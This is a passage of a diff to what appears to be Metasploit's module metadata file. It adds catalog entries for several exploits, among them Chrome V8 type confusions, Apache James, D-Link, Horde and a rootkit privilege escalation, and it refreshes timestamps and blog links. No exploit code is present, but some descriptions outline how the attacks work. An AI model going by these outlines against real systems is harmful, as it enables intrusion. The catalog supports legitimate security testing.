    "path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/smt_ipmi_close_window_bof",
@@ -58993,7 +59042,7 @@
      "Automatic (Unix In-Memory)",
      "Automatic (Linux Dropper)"
    ],
-    "mod_time": "2020-01-16 14:46:00 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
    "is_install_path": true,
    "ref_name": "linux/http/webmin_backdoor",
@@ -59349,7 +59398,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -60268,6 +60317,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
+    "name": "Diamorphine Rootkit Signal Privilege Escalation",
+    "fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-11-07",
+    "type": "exploit",
+    "author": [
+      "m0nad",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Diamorphine rootkit's privesc feature using signal\n        64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n        This module has been tested successfully with Diamorphine from `master`\n        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
+    "references": [
+      "URL-https://github.com/m0nad/Diamorphine"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-16 14:53:16 +0000",
+    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/docker_daemon_privilege_escalation": {
    "name": "Docker Daemon Privilege Escalation",
    "fullname": "exploit/linux/local/docker_daemon_privilege_escalation",
@@ -60322,7 +60417,7 @@
      "Marco Ivaldi",
      "Guillaume André"
    ],
-    "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n        Improper validation of recipient address in deliver_message()\n        function in /src/deliver.c may lead to command execution with root privileges\n        (CVE-2019-10149).",
+    "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n          Improper validation of recipient address in deliver_message()\n          function in /src/deliver.c may lead to command execution with root privileges\n          (CVE-2019-10149).",
    "references": [
      "CVE-2019-10149",
      "EDB-46996",
@@ -60340,7 +60435,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2019-07-18 10:45:44 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -61007,7 +61102,7 @@
    "targets": [
      "Micro Focus (HPE) Data Protector <= 10.40 build 118"
    ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -61922,7 +62017,7 @@
      "BID-61966",
      "URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
      "URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
+      "URL-https://blog.rapid7.com/2013/09/05/cve-2013-1662-vmware-mount-exploit"
    ],
    "platform": "Linux",
    "arch": "x86",
@@ -61936,7 +62031,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-10-10 14:35:34 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/local/vmware_mount.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmware_mount",
@@ -62258,7 +62353,7 @@
    "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
    "references": [
      "CVE-2014-4880",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://blog.rapid7.com/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "armle",
@@ -62273,7 +62368,7 @@
      "DS-7204 Firmware V2.2.10 build 131009",
      "Debug Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -63588,11 +63683,11 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-12-09 20:09:52 +0000",
+    "mod_time": "2020-03-25 10:06:35 +0000",
    "path": "/modules/exploits/linux/redis/redis_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_unauth_exec",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -63861,6 +63956,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/smtp/apache_james_exec": {
+    "name": "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+    "fullname": "exploit/linux/smtp/apache_james_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2015-10-01",
+    "type": "exploit",
+    "author": [
+      "Palaczynski Jakub",
+      "Matthew Aberegg",
+      "Michael Burkey"
+    ],
+    "description": "This module exploits a vulnerability that exists due to a lack of input\n        validation when creating a user. Messages for a given user are stored\n        in a directory partially defined by the username. By creating a user\n        with a directory traversal payload as the username, commands can be\n        written to a given directory. To use this module with the cron\n        exploitation method, run the exploit using the given payload, host, and\n        port. After running the exploit, the payload will be executed within 60\n        seconds. Due to differences in how cron may run in certain Linux\n        operating systems such as Ubuntu, it may be preferable to set the\n        target to Bash Completion as the cron method may not work. If the target\n        is set to Bash completion, start a listener using the given payload,\n        host, and port before running the exploit. After running the exploit,\n        the payload will be executed when a user logs into the system. For this\n        exploitation method, bash completion must be enabled to gain code\n        execution. This exploitation method will leave an Apache James mail\n        object artifact in the /etc/bash_completion.d directory and the\n        malicious user account.",
+    "references": [
+      "CVE-2015-7611",
+      "EDB-35513",
+      "URL-https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Bash Completion",
+      "Cron"
+    ],
+    "mod_time": "2020-02-19 18:57:08 +0000",
+    "path": "/modules/exploits/linux/smtp/apache_james_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/smtp/apache_james_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/smtp/exim4_dovecot_exec": {
    "name": "Exim and Dovecot Insecure Configuration Command Injection",
    "fullname": "exploit/linux/smtp/exim4_dovecot_exec",
@@ -64189,7 +64328,7 @@
    "references": [
      "CVE-2016-1560",
      "CVE-2016-1561",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
+      "URL-https://blog.rapid7.com/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -64203,7 +64342,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/exagrid_known_privkey",
@@ -64231,7 +64370,7 @@
      "URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
      "CVE-2012-1493",
      "OSVDB-82780",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
+      "URL-https://blog.rapid7.com/2012/06/25/press-f5-for-root-shell"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -64245,7 +64384,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/f5_bigip_known_privkey",
@@ -64674,7 +64813,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-04-24 11:39:34 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -64695,6 +64834,47 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_exec_ssdpcgi": {
+    "name": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi",
+    "fullname": "exploit/linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "s1kr10s",
+      "secenv"
+    ],
+    "description": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.",
+    "references": [
+      "CVE-2019-20215",
+      "URL-https://medium.com/@s1kr10s/2e799acb8a73"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "1900",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-05 11:53:51 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
@@ -64807,7 +64987,7 @@
      "CVE-2013-0230",
      "OSVDB-89624",
      "BID-57608",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
    ],
    "platform": "Linux",
    "arch": "x86, mipsbe",
@@ -64831,7 +65011,7 @@
      "Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
      "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/miniupnpd_soap_bof",
@@ -65252,6 +65432,141 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/browser/chrome_array_map": {
+    "name": "Google Chrome 72 and 73 Array.map exploit",
+    "fullname": "exploit/multi/browser/chrome_array_map",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2019-03-07",
+    "type": "exploit",
+    "author": [
+      "dmxcsnsbh",
+      "István Kurucsai",
+      "timwr"
+    ],
+    "description": "This module exploits an issue in Chrome 73.0.3683.86 (64 bit).\n      The exploit corrupts the length of a float in order to modify the backing store\n      of a typed array. The typed array can then be used to read and write arbitrary\n      memory. The exploit then uses WebAssembly in order to allocate a region of RWX\n      memory, which is then replaced with the payload.\n        The payload is executed within the sandboxed renderer process, so the browser\n      must be run with the --no-sandbox option for the payload to work correctly.",
+    "references": [
+      "CVE-2019-5825",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=941743",
+      "URL-https://github.com/exodusintel/Chromium-941743",
+      "URL-https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/",
+      "URL-https://lordofpwn.kr/cve-2019-5825-v8-exploit/"
+    ],
+    "platform": "OSX,Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-15 10:37:15 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_array_map.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_array_map",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_multi/browser/chrome_jscreate_sideeffect": {
+    "name": "Google Chrome 80 JSCreate side-effect type confusion exploit",
+    "fullname": "exploit/multi/browser/chrome_jscreate_sideeffect",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-02-19",
+    "type": "exploit",
+    "author": [
+      "Clément Lecigne",
+      "István Kurucsai",
+      "Vignesh S Rao",
+      "timwr"
+    ],
+    "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n      corrupts the length of a float array (float_rel), which can then be used for out\n      of bounds read and write on adjacent memory.\n      The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n      which is used for read and writing from absolute memory.\n      The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n      which is then replaced with the payload shellcode.\n      The payload is executed within the sandboxed renderer process, so the browser\n      must be run with the --no-sandbox option for the payload to work correctly.",
+    "references": [
+      "CVE-2020-6418",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=1053604",
+      "URL-https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping",
+      "URL-https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"
+    ],
+    "platform": "",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 10 - Google Chrome 80.0.3987.87 (64 bit)",
+      "macOS - Google Chrome 80.0.3987.87 (64 bit)"
+    ],
+    "mod_time": "2020-03-04 21:23:53 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_jscreate_sideeffect",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_multi/browser/chrome_object_create": {
+    "name": "Google Chrome 67, 68 and 69 Object.create exploit",
+    "fullname": "exploit/multi/browser/chrome_object_create",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2018-09-25",
+    "type": "exploit",
+    "author": [
+      "saelo",
+      "timwr"
+    ],
+    "description": "This modules exploits a type confusion in Google Chromes JIT compiler.\n      The Object.create operation can be used to cause a type confusion between a\n      PropertyArray and a NameDictionary.\n        The payload is executed within the rwx region of the sandboxed renderer\n      process, so the browser must be run with the --no-sandbox option for the\n      payload to work.",
+    "references": [
+      "CVE-2018-17463",
+      "URL-http://www.phrack.org/papers/jit_exploitation.html",
+      "URL-https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce",
+      "URL-https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=888923"
+    ],
+    "platform": "OSX,Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-15 06:09:55 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_object_create.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_object_create",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/browser/firefox_escape_retval": {
    "name": "Firefox 3.5 escape() Return Value Memory Corruption",
    "fullname": "exploit/multi/browser/firefox_escape_retval",
@@ -65400,7 +65715,7 @@
      "CVE-2014-8636",
      "CVE-2015-0802",
      "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
+      "URL-https://blog.rapid7.com/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
    ],
    "platform": "",
    "arch": "",
@@ -65415,7 +65730,7 @@
      "Universal (Javascript XPCOM Shell)",
      "Native Payload"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/firefox_proxy_prototype",
@@ -65708,7 +66023,7 @@
      "URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
      "URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
+      "URL-https://blog.rapid7.com/2012/03/29/cve-2012-0507--java-strikes-again"
    ],
    "platform": "Java,Linux,OSX,Solaris,Windows",
    "arch": "",
@@ -65726,7 +66041,7 @@
      "Mac OS X x86 (Native Payload)",
      "Linux x86 (Native Payload)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/java_atomicreferencearray",
@@ -65903,7 +66218,7 @@
      "URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
      "URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
      "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
+      "URL-https://blog.rapid7.com/2012/08/27/lets-start-the-week-with-a-new-java-0day",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
    ],
    "platform": "Java,Linux,Windows",
@@ -65920,7 +66235,7 @@
      "Windows Universal",
      "Linux x86"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/java_jre17_exec",
@@ -67415,7 +67730,7 @@
    "references": [
      "CVE-2016-5641",
      "URL-http://github.com/swagger-api/swagger-codegen",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
+      "URL-https://blog.rapid7.com/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
    ],
    "platform": "Java,NodeJS,PHP,Ruby",
    "arch": "nodejs, php, java, ruby",
@@ -67432,7 +67747,7 @@
      "Java JSP",
      "Ruby"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/swagger_param_inject",
@@ -68533,7 +68848,7 @@
      "Cisco DCNM 11.0(1)",
      "Cisco DCNM 10.4(2)"
    ],
-    "mod_time": "2019-08-29 12:42:01 +0000",
+    "mod_time": "2020-03-12 17:08:33 +0000",
    "path": "/modules/exploits/multi/http/cisco_dcnm_upload_2019.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cisco_dcnm_upload_2019",
@@ -69371,7 +69686,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-24 08:47:21 +0000",
    "path": "/modules/exploits/multi/http/freenas_exec_raw.rb",
    "is_install_path": true,
    "ref_name": "multi/http/freenas_exec_raw",
@@ -69398,7 +69713,7 @@
    "references": [
      "URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
      "URL-https://github.com/rapid7/metasploit-framework/pull/2461",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
+      "URL-https://blog.rapid7.com/2013/10/03/gestioip-authenticated-remote-command-execution-module"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -69421,7 +69736,7 @@
    "targets": [
      "Automatic GestioIP 3.0"
    ],
-    "mod_time": "2018-08-09 23:34:03 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/gestioip_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gestioip_exec",
@@ -69496,7 +69811,7 @@
    "description": "This module exploits CVE-2014-9390, which affects Git (versions less\n        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n        less than 3.2.3) and describes three vulnerabilities.\n\n        On operating systems which have case-insensitive file systems, like\n        Windows and OS X, Git clients can be convinced to retrieve and\n        overwrite sensitive configuration files in the .git\n        directory which can allow arbitrary code execution if a vulnerable\n        client can be convinced to perform certain actions (for example,\n        a checkout) against a malicious Git repository.\n\n        A second vulnerability with similar characteristics also exists in both\n        Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n        certain Unicode codepoints are ignorable.\n\n        The third vulnerability with similar characteristics only affects\n        Mercurial clients on Windows, where Windows \"short names\"\n        (MS-DOS-compatible 8.3 format) are supported.\n\n        Today this module only truly supports the first vulnerability (Git\n        clients on case-insensitive file systems) but has the functionality to\n        support the remaining two with a little work.",
    "references": [
      "CVE-2014-9390",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
+      "URL-https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
      "URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
      "URL-http://article.gmane.org/gmane.linux.kernel/1853266",
      "URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
@@ -69518,7 +69833,7 @@
      "Automatic",
      "Windows Powershell"
    ],
-    "mod_time": "2018-10-18 11:24:54 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/git_client_command_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/git_client_command_exec",
@@ -69917,6 +70232,55 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/horde_csv_rce": {
+    "name": "Horde CSV import arbitrary PHP code execution",
+    "fullname": "exploit/multi/http/horde_csv_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-07",
+    "type": "exploit",
+    "author": [
+      "Andrea Cardaci <cyrus.and@gmail.com>"
+    ],
+    "description": "The Horde_Data module version 2.1.4 (and before) present in Horde\n          Groupware version 5.2.22 allows authenticated users to inject\n          arbitrary PHP code thus achieving RCE on the server hosting the web\n          application.",
+    "references": [
+      "CVE-2020-8518",
+      "URL-https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-03-23 07:28:04 +0000",
+    "path": "/modules/exploits/multi/http/horde_csv_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/horde_csv_rce",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/horde_form_file_upload": {
    "name": "Horde Form File Upload Vulnerability",
    "fullname": "exploit/multi/http/horde_form_file_upload",
@@ -70303,7 +70667,7 @@
    "description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n      which is intended to be reuploaded later to restore language settings. This feature\n      can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n      This module was tested against version 3.0.5.2.",
    "references": [
      "CVE-2013-3629",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -70326,7 +70690,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/ispconfig_php_exec",
@@ -70667,7 +71031,7 @@
      "Unix In-Memory",
      "Java Dropper"
    ],
-    "mod_time": "2019-05-30 00:06:10 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jenkins_metaprogramming",
@@ -71165,7 +71529,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-24 08:47:21 +0000",
    "path": "/modules/exploits/multi/http/magento_unserialize.rb",
    "is_install_path": true,
    "ref_name": "multi/http/magento_unserialize",
@@ -71665,7 +72029,7 @@
    "description": "This module exploits the Web UI for Metasploit Community, Express and\n        Pro where one of a certain set of Weekly Releases have been applied.\n        These Weekly Releases introduced a static secret_key_base value.\n        Knowledge of the static secret_key_base value allows for\n        deserialization of a crafted Ruby Object, achieving code execution.\n\n        This module is based on\n        exploits/multi/http/rails_secret_deserialization",
    "references": [
      "OVE-20160904-0002",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
+      "URL-https://blog.rapid7.com/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
      "URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
    ],
    "platform": "Ruby",
@@ -71689,7 +72053,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
    "is_install_path": true,
    "ref_name": "multi/http/metasploit_static_secret_key_base",
@@ -71918,7 +72282,7 @@
    "references": [
      "CVE-2013-3630",
      "EDB-28174",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -71941,7 +72305,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-05-10 14:02:01 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/moodle_cmd_exec",
@@ -72075,7 +72439,7 @@
    "description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n      the code executed remotely. This module was successfully tested against NAS4Free version\n      9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
    "references": [
      "CVE-2013-3631",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -72098,7 +72462,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/nas4free_php_exec",
@@ -72657,7 +73021,7 @@
    "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
    "references": [
      "CVE-2013-3632",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
